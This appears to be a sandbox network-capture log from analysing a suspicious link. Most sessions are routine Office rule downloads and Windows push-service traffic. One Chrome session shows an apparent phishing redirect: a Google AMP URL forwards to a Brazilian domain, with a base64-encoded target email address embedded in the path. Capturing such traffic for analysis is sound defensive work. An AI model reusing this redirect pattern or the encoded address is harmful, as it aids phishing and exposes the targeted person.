                      2024-12-03 16:51:33 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.649736172.217.171.1954436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:32 UTC1095OUTGET /amp/s/handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1
                      Host: www.google.dz
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: NID=519=QwvK-YsQkeGDsv9h92JL7g8Bxmi17LYPohkXyYCSaih1wDYjcODLjewFr-Qf2lPg2LPHbJZ179qVuKrRKPYeQH1KvbHcKTdvKNNcNCDcRfXJhI7Ur7aZyoIlbAzJ8qNaxI1CDcV3Ph_ak9v0D_aQ8FBEIxtu3Dy6Jg9Xf8C198LYVZF0Moqqcz8FadBGB2ot5WUS
                      2024-12-03 16:51:34 UTC859INHTTP/1.1 302 Found
                      Location: https://handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==$$$
                      Cache-Control: private
                      X-Robots-Tag: noindex
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-7uDEsAMIf-x7SMafOgVs9Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                      Permissions-Policy: unload=()
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Server: gws
                      Content-Length: 287
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-12-03 16:51:34 UTC287INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 68 61 6e 64 6c 69 6e 67 73 65 72 76 69 63 65 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 73 69 74 67 2f 59 57 31 35 4c 6d 64 70 62 48 42 70 62 6b 42 6a 61 47 56 79 62 32 74 6c 5a 57 4a 79 61 57 4e 72 4c 6d 4e 76 62 51 3d 3d e3 80 82 24 24 24
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==$$$


                      Session IDSource IPSource PortDestination IPDestination Port
                      18192.168.2.64973213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:32 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Content-Type: text/xml
                      Content-Length: 415
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                      ETag: "0x8DC582B9F6F3512"
                      x-ms-request-id: e1e1876a-701e-0001-22c7-43b110000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165133Z-174f7845968xlwnmhC1EWR0sv80000001640000000003m9z
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:33 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                      Session IDSource IPSource PortDestination IPDestination Port
                      19192.168.2.64973413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:33 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Content-Type: text/xml
                      Content-Length: 632
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                      ETag: "0x8DC582BB6E3779E"
                      x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165133Z-174f7845968glpgnhC1EWR7uec00000016ag00000000mdsn
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:33 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                      Session IDSource IPSource PortDestination IPDestination Port
                      20192.168.2.64974013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:35 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Content-Type: text/xml
                      Content-Length: 486
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                      ETag: "0x8DC582B9018290B"
                      x-ms-request-id: 957c193a-901e-008f-36b3-4267a6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165135Z-174f7845968px8v7hC1EWR08ng00000016b000000000wfnk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      21192.168.2.64973913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:35 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Content-Type: text/xml
                      Content-Length: 407
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                      ETag: "0x8DC582BBAD04B7B"
                      x-ms-request-id: 12c713eb-c01e-0034-6a92-432af6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165135Z-174f7845968glpgnhC1EWR7uec00000016c000000000cknz
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                      Session IDSource IPSource PortDestination IPDestination Port
                      22192.168.2.64973713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:35 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Content-Type: text/xml
                      Content-Length: 486
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                      ETag: "0x8DC582BB344914B"
                      x-ms-request-id: 54795c3a-901e-0064-35fd-44e8a6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165135Z-174f7845968cs2nkhC1EWR2tq000000001z0000000003rus
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      23192.168.2.64973813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:36 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Content-Type: text/xml
                      Content-Length: 427
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                      ETag: "0x8DC582BA310DA18"
                      x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165135Z-174f7845968jrjrxhC1EWRmmrs00000016a000000000gex2
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:36 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                      Session IDSource IPSource PortDestination IPDestination Port
                      24192.168.2.64974220.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 78 78 79 49 58 4c 43 58 6b 6d 76 69 71 5a 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 33 65 37 38 31 63 38 64 62 61 61 37 35 65 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: axxyIXLCXkmviqZr.1Context: 1a3e781c8dbaa75e
                      2024-12-03 16:51:35 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:51:35 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 78 78 79 49 58 4c 43 58 6b 6d 76 69 71 5a 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 33 65 37 38 31 63 38 64 62 61 61 37 35 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: axxyIXLCXkmviqZr.2Context: 1a3e781c8dbaa75e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:35 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 78 78 79 49 58 4c 43 58 6b 6d 76 69 71 5a 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 33 65 37 38 31 63 38 64 62 61 61 37 35 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: axxyIXLCXkmviqZr.3Context: 1a3e781c8dbaa75e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2024-12-03 16:51:36 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:36 UTC58INData Raw: 4d 53 2d 43 56 3a 20 33 46 45 43 6c 58 76 51 6c 45 32 43 78 72 68 58 35 78 62 51 36 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: 3FEClXvQlE2CxrhX5xbQ6g.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      25192.168.2.64974113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:35 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:36 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Content-Type: text/xml
                      Content-Length: 407
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                      ETag: "0x8DC582B9698189B"
                      x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165135Z-174f7845968pght8hC1EWRyvxg000000099g00000000nxbe
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:36 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.64974320.109.210.53443
                      TimestampBytes transferredDirectionData
